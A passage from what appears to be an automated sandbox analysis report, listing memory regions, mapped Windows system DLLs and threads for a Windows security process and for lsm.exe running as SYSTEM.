pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 36920 start_va = 0x4f0000 end_va = 0x5f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 36921 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 36922 start_va = 0xd0000 end_va = 0xd0fff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 36923 start_va = 0xe0000 end_va = 0xeffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 36924 start_va = 0x720000 end_va = 0x75ffff entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 36925 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 36926 start_va = 0x600000 end_va = 0x700fff entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 36927 start_va = 0x600000 end_va = 0x700fff entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 36928 start_va = 0x600000 end_va = 0x700fff entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 36929 start_va = 0x600000 end_va = 0x700fff entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 36930 start_va = 0x600000 end_va = 0x700fff entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 36931 start_va = 0xf0000 end_va = 0xfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 36932 start_va = 0x758d0000 end_va = 0x758d5fff entry_point = 0x758d0000 region_type = mapped_file name = "cngaudit.dll" filename = "\\Windows\\System32\\cngaudit.dll" (normalized: "c:\\windows\\system32\\cngaudit.dll") Region: id = 36933 start_va = 0x758b0000 end_va = 0x758cafff entry_point = 0x758b0000 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 36934 start_va = 0x75870000 end_va = 0x758a7fff entry_point = 0x75870000 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 36935 start_va = 0x75850000 end_va = 0x75866fff entry_point = 0x75850000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 36936 start_va = 0x620000 end_va = 0x65ffff entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 36937 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 36938 start_va = 0x7d0000 end_va = 0x80ffff entry_point = 0x0 region_type = private name = "private_0x00000000007d0000" filename = "" Region: id = 36939 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 36940 start_va = 0x100000 end_va = 0x106fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 36941 start_va = 0x120000 end_va = 0x121fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 36942 start_va = 0x810000 end_va = 0xc02fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000810000" filename = "" Region: id = 36943 start_va = 0x75840000 end_va = 0x75841fff entry_point = 0x75840000 region_type = mapped_file name = "msprivs.dll" filename = "\\Windows\\System32\\msprivs.dll" (normalized: "c:\\windows\\system32\\msprivs.dll") Region: id = 36944 start_va = 0xc80000 end_va = 0xcbffff entry_point = 0x0 region_type = private name = "private_0x0000000000c80000" filename = "" Region: id = 36945 start_va = 0x75810000 end_va = 0x7583afff entry_point = 0x75810000 region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 36946 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 36947 start_va = 0xcc0000 end_va = 0xf8efff entry_point = 0xcc0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 36948 start_va = 0x757f0000 end_va = 0x7580afff entry_point = 0x757f0000 region_type = mapped_file name = "negoexts.dll" filename = "\\Windows\\System32\\negoexts.dll" (normalized: "c:\\windows\\system32\\negoexts.dll") Region: id = 36949 start_va = 0x75b30000 end_va = 0x75b37fff entry_point = 0x75b30000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 36950 start_va = 0xc20000 end_va = 0xc5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c20000" filename = "" Region: id = 36951 start_va = 0x75ba0000 end_va = 0x75babfff entry_point = 0x75ba0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 36952 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 36953 start_va = 0x75760000 end_va = 0x757e7fff entry_point = 0x75760000 region_type = mapped_file name = "kerberos.dll" filename = "\\Windows\\System32\\kerberos.dll" (normalized: "c:\\windows\\system32\\kerberos.dll") Region: id = 36954 start_va = 0x130000 end_va = 0x13ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 36955 start_va = 0x75740000 end_va = 0x75755fff entry_point = 0x75740000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 36956 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 36957 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 36958 start_va = 0x77120000 end_va = 0x77154fff entry_point = 0x77120000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 36959 start_va = 0x770f0000 end_va = 0x770f5fff entry_point = 0x770f0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 36960 start_va = 0x75700000 end_va = 0x7573bfff entry_point = 0x75700000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 36961 start_va = 0x756f0000 end_va = 0x756f5fff entry_point = 0x756f0000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 36962 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 36963 start_va = 0xf90000 end_va = 0x1090fff entry_point = 0x0 region_type = private name = "private_0x0000000000f90000" filename = "" Region: id = 36964 start_va = 0xf90000 end_va = 0x1090fff entry_point = 0x0 region_type = private name = "private_0x0000000000f90000" filename = "" Region: id = 36965 start_va = 0xf90000 end_va = 0x1090fff entry_point = 0x0 region_type = private name = "private_0x0000000000f90000" filename = "" Region: id = 36966 start_va = 0x756a0000 end_va = 0x756e1fff entry_point = 0x756a0000 region_type = mapped_file name = "msv1_0.dll" filename = "\\Windows\\System32\\msv1_0.dll" (normalized: "c:\\windows\\system32\\msv1_0.dll") Region: id = 36967 start_va = 0x140000 end_va = 0x14ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 36968 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 36969 start_va = 0x75610000 end_va = 0x7569bfff entry_point = 0x75610000 region_type = mapped_file name = "netlogon.dll" filename = "\\Windows\\System32\\netlogon.dll" (normalized: "c:\\windows\\system32\\netlogon.dll") Region: id = 36970 start_va = 0x755c0000 end_va = 0x75603fff entry_point = 0x755c0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 36971 start_va = 0x75590000 end_va = 0x755b1fff entry_point = 0x75590000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 36972 start_va = 0x260000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 36973 start_va = 0x75550000 end_va = 0x75589fff entry_point = 0x75550000 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 36974 start_va = 0x75d90000 end_va = 0x75eacfff entry_point = 0x75d90000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 36975 start_va = 0x140000 end_va = 0x14ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 36976 start_va = 0x75520000 end_va = 0x7554bfff entry_point = 0x75520000 region_type = mapped_file name = "wdigest.dll" filename = "\\Windows\\System32\\wdigest.dll" (normalized: "c:\\windows\\system32\\wdigest.dll") Region: id = 36977 start_va = 0x140000 end_va = 0x14ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 36978 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x2a0000 region_type = mapped_file name = "c_28591.nls" filename = "\\Windows\\System32\\C_28591.NLS" (normalized: "c:\\windows\\system32\\c_28591.nls") Region: id = 36979 start_va = 0x3b0000 end_va = 0x3ebfff entry_point = 0x3b0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 36980 start_va = 0x3b0000 end_va = 0x3ebfff entry_point = 0x3b0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 36981 start_va = 0x3b0000 end_va = 0x3ebfff entry_point = 0x3b0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 36982 start_va = 0x3b0000 end_va = 0x3ebfff entry_point = 0x3b0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 36983 start_va = 0x3b0000 end_va = 0x3ebfff entry_point = 0x3b0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 36984 start_va = 0x754e0000 end_va = 0x7551afff entry_point = 0x754e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 36985 start_va = 0x140000 end_va = 0x14ffff entry_point = 0x140000 region_type = mapped_file name = "tspkg.dll" filename = "\\Windows\\System32\\TSpkg.dll" (normalized: "c:\\windows\\system32\\tspkg.dll") Region: id = 36986 start_va = 0x140000 end_va = 0x14ffff entry_point = 0x140000 region_type = mapped_file name = "tspkg.dll" filename = "\\Windows\\System32\\TSpkg.dll" (normalized: "c:\\windows\\system32\\tspkg.dll") Region: id = 36987 start_va = 0x754c0000 end_va = 0x754d1fff entry_point = 0x754c0000 region_type = mapped_file name = "tspkg.dll" filename = "\\Windows\\System32\\TSpkg.dll" (normalized: "c:\\windows\\system32\\tspkg.dll") Region: id = 36988 start_va = 0x754a0000 end_va = 0x754b1fff entry_point = 0x754a0000 region_type = mapped_file name = "tspkg.dll" filename = "\\Windows\\System32\\TSpkg.dll" (normalized: "c:\\windows\\system32\\tspkg.dll") Region: id = 36989 start_va = 0x140000 end_va = 0x14ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 36990 start_va = 0x75460000 end_va = 0x75493fff entry_point = 0x75460000 region_type = mapped_file name = "pku2u.dll" filename = "\\Windows\\System32\\pku2u.dll" (normalized: "c:\\windows\\system32\\pku2u.dll") Region: id = 36991 start_va = 0x75420000 end_va = 0x7545cfff entry_point = 0x75420000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 36992 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 36993 start_va = 0x75c40000 end_va = 0x75c4dfff entry_point = 0x75c40000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 36994 start_va = 0x754d0000 end_va = 0x754dcfff entry_point = 0x754d0000 region_type = mapped_file name = "efslsaext.dll" filename = "\\Windows\\System32\\efslsaext.dll" (normalized: "c:\\windows\\system32\\efslsaext.dll") Region: id = 36995 start_va = 0x350000 end_va = 0x350fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 36996 start_va = 0x360000 end_va = 0x360fff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 36997 start_va = 0x3b0000 end_va = 0x3b0fff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 36998 start_va = 0x3c0000 end_va = 0x3c0fff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 36999 start_va = 0x3d0000 end_va = 0x3d0fff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 37000 start_va = 0x3e0000 end_va = 0x3e0fff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 37001 start_va = 0x600000 end_va = 0x600fff entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 37002 start_va = 0x610000 end_va = 0x610fff entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 37003 start_va = 0x754c0000 end_va = 0x754c7fff entry_point = 0x754c0000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 37004 start_va = 0xf90000 end_va = 0x1090fff entry_point = 0x0 region_type = private name = "private_0x0000000000f90000" filename = "" Region: id = 37005 start_va = 0xf90000 end_va = 0x1090fff entry_point = 0x0 region_type = private name = "private_0x0000000000f90000" filename = "" Region: id = 37006 start_va = 0xf90000 end_va = 0x1090fff entry_point = 0x0 region_type = private name = "private_0x0000000000f90000" filename = "" Region: id = 37007 start_va = 0xfe0000 end_va = 0x101ffff entry_point = 0x0 region_type = private name = "private_0x0000000000fe0000" filename = "" Region: id = 37008 start_va = 0x1020000 end_va = 0x111ffff entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 37009 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 37010 start_va = 0x660000 end_va = 0x660fff entry_point = 0x660000 region_type = mapped_file name = "04ece708-132d-4bf0-a647-e3329269a012" filename = "\\Windows\\System32\\Microsoft\\Protect\\S-1-5-18\\User\\04ece708-132d-4bf0-a647-e3329269a012" (normalized: "c:\\windows\\system32\\microsoft\\protect\\s-1-5-18\\user\\04ece708-132d-4bf0-a647-e3329269a012") Region: id = 37011 start_va = 0x6a0000 end_va = 0x6dffff entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 37012 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 37013 start_va = 0x1140000 end_va = 0x117ffff entry_point = 0x0 region_type = private name = "private_0x0000000001140000" filename = "" Region: id = 37014 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 37015 start_va = 0x660000 end_va = 0x660fff entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 37016 start_va = 0x753f0000 end_va = 0x7541dfff entry_point = 0x753f0000 region_type = mapped_file name = "scecli.dll" filename = "\\Windows\\System32\\scecli.dll" (normalized: "c:\\windows\\system32\\scecli.dll") Region: id = 37017 start_va = 0x660000 end_va = 0x660fff entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 37018 start_va = 0x760000 end_va = 0x79ffff entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 37019 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 37020 start_va = 0x660000 end_va = 0x660fff entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 37021 start_va = 0x660000 end_va = 0x660fff entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 37022 start_va = 0x660000 end_va = 0x660fff entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 37023 start_va = 0x660000 end_va = 0x660fff entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 37024 start_va = 0x660000 end_va = 0x660fff entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 37025 start_va = 0x660000 end_va = 0x660fff entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 37026 start_va = 0x660000 end_va = 0x660fff entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 37027 start_va = 0x660000 end_va = 0x660fff entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 37028 start_va = 0x753e0000 end_va = 0x753e7fff entry_point = 0x753e0000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 37044 start_va = 0x150000 end_va = 0x150fff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 37045 start_va = 0x150000 end_va = 0x150fff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 37046 start_va = 0x150000 end_va = 0x150fff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 37047 start_va = 0x150000 end_va = 0x150fff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 37048 start_va = 0x150000 end_va = 0x150fff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 37070 start_va = 0x150000 end_va = 0x154fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 37099 start_va = 0x75c10000 end_va = 0x75c38fff entry_point = 0x75c10000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 37533 start_va = 0xfa0000 end_va = 0xfdffff entry_point = 0x0 region_type = private name = "private_0x0000000000fa0000" filename = "" Region: id = 37534 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 37702 start_va = 0x1140000 end_va = 0x117ffff entry_point = 0x0 region_type = private name = "private_0x0000000001140000" filename = "" Region: id = 37703 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 37704 start_va = 0x1180000 end_va = 0x11fffff entry_point = 0x0 region_type = private name = "private_0x0000000001180000" filename = "" Region: id = 38226 start_va = 0x75230000 end_va = 0x75234fff entry_point = 0x75230000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 38412 start_va = 0x72b60000 end_va = 0x72b7bfff entry_point = 0x72b60000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 38413 start_va = 0x72b50000 end_va = 0x72b56fff entry_point = 0x72b50000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 38414 start_va = 0x150000 end_va = 0x150fff entry_point = 0x150000 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 38415 start_va = 0x150000 end_va = 0x150fff entry_point = 0x150000 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 38417 start_va = 0x150000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 38418 start_va = 0x744f0000 end_va = 0x744f8fff entry_point = 0x744f0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 38419 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 38439 start_va = 0x75300000 end_va = 0x75316fff entry_point = 0x75300000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 38440 start_va = 0x75c50000 end_va = 0x75c5afff entry_point = 0x75c50000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Thread: id = 1059 os_tid = 0x1d4 Thread: id = 1061 os_tid = 0x1e0 Thread: id = 1063 os_tid = 0x1e8 Thread: id = 1064 os_tid = 0x1ec Thread: id = 1066 os_tid = 0x1f0 Thread: id = 1067 os_tid = 0x1f8 Thread: id = 1068 os_tid = 0x1fc Thread: id = 1069 os_tid = 0x200 Thread: id = 1070 os_tid = 0x204 Thread: id = 1071 os_tid = 0x208 Thread: id = 1072 os_tid = 0x20c Thread: id = 1132 os_tid = 0x304 Thread: id = 1136 os_tid = 0x31c Thread: id = 1200 os_tid = 0x42c Thread: id = 1227 os_tid = 0x4a4 Process: id = "669" image_name = "lsm.exe" filename = "c:\\windows\\system32\\lsm.exe" page_root = "0x7f1d1100" os_pid = "0x1d8" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "664" os_parent_pid = "0x160" cmd_line = "C:\\Windows\\system32\\lsm.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Region: id = 36820 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 36821 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 36822 start_va = 0xd0000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 36823 start_va = 0x860000 end_va = 0x8a3fff entry_point = 0x860000 region_type = mapped_file name = "lsm.exe" filename = "\\Windows\\System32\\lsm.exe" (normalized: "c:\\windows\\system32\\lsm.exe") Region: id = 36824 start_va = 0x77b00000 end_va = 0x77c3bfff entry_point = 0x77b00000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 36825 start_va = 0x77d40000 end_va = 0x77d40fff entry_point = 0x77d40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 36826 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 36827 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 36828 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 36830 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 36873 start_va = 0x110000 end_va = 0x23ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 36874 start_va = 0x77990000 end_va = 0x77a63fff entry_point = 0x77990000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 36875 start_va = 0x75eb0000 end_va = 0x75ef9fff entry_point = 0x75eb0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 36876 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 36877 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 36878 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 36879 start_va = 0x75f50000 end_va = 0x75ffbfff entry_point = 0x75f50000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 36880 start_va = 0x77c40000 end_va = 0x77c58fff entry_point = 0x77c40000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 36881 start_va = 0x77c80000 end_va = 0x77d20fff entry_point = 0x77c80000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 36882 start_va = 0x75b50000 end_va = 0x75b56fff entry_point = 0x75b50000 region_type = mapped_file name = "sysntfy.dll" filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll") Region: id = 36883 start_va = 0x75b40000 end_va = 0x75b45fff entry_point = 0x75b40000 region_type = mapped_file name = "wmsgapi.dll" filename = "\\Windows\\System32\\wmsgapi.dll" (normalized: "c:\\windows\\system32\\wmsgapi.dll") Region: id = 36884 start_va = 0x240000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 37124 start_va = 0x360000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 37125 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 37126 start_va = 0x75ba0000 end_va = 0x75babfff entry_point = 0x75ba0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 37127 start_va = 0x3a0000 end_va = 0x66efff entry_point = 0x3a0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 37326 start_va = 0x700000 end_va = 0x73ffff entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 37327 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 37382 start_va = 0x770000 end_va = 0x7affff entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 37383 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 37384 start_va = 0x752b0000 end_va = 0x752bafff entry_point = 0x752b0000 region_type = mapped_file name = "pcwum.dll" filename = "\\Windows\\System32\\pcwum.dll" (normalized: "c:\\windows\\system32\\pcwum.dll") Region: id = 37385 start_va = 0x8b0000 end_va = 0xa9ffff entry_point = 0x0 region_type = private name = "private_0x00000000008b0000" filename = "" Region: id = 37386 start_va = 0x75c40000 end_va = 0x75c4dfff entry_point = 0x75c40000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 37387 start_va = 0x75b30000 end_va = 0x75b37fff entry_point = 0x75b30000 region_type = mapped_file name = 